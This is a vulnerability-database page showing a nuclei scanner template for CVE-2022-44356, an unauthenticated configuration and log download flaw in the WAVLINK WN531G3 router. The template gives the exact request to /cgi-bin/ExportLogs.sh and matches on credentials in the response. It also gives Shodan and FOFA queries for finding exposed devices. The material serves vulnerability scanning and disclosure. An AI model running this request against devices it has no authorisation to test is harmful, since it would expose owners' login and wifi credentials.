Lucene search

K

WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure

🗓️ 06 Nov 2024 17:42:54Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

WAVLINK Quantum D4G (WL-WN531G3) has access control issue allowing unauthenticated attackers to download configuration data and log files, leading to sensitive information disclosure

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WAVLINK WN531G3 Access Control Error Vulnerability
30 Nov 202200:00
cnvd
Cvelist
CVE-2022-44356
29 Nov 202200:00
cvelist
CVE
CVE-2022-44356
29 Nov 202217:15
cve
Prion
Design/Logic Flaw
29 Nov 202217:15
prion
NVD
CVE-2022-44356
29 Nov 202217:15
nvd
id: CVE-2022-44356

info:
  name: WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files.
  impact: |
    Successful exploitation could lead to sensitive information disclosure.
  reference:
    - https://github.com/strik3r0x1/Vulns/blob/main/Wavlink%20WL-WN531G3.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44356
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-44356
    cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:m31g3.v5030.200325:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: wavlink
    product: wl-wn531g3_firmware
    shodan-query: html:"WN531G3"
    fofa-query: body="WN531G3"
  tags: cve,cve2022,wavlink,exposure,wn531g3

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "WN531G3")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
          - 'contains_all(header, "application/octet-stream", "filename=\"")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221008e5f7ec61072e84466905a80dfc01ee661835391f14e93242a47a6eb961863e7022055001a053c52d9c3cd335ad3de27e3e61830168ec8824e6da8d718debcf5a11e:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Nov 2024 17:54Current
7High risk
Vulners AI Score7
CVSS37.5
EPSS0.029
4
.json
Report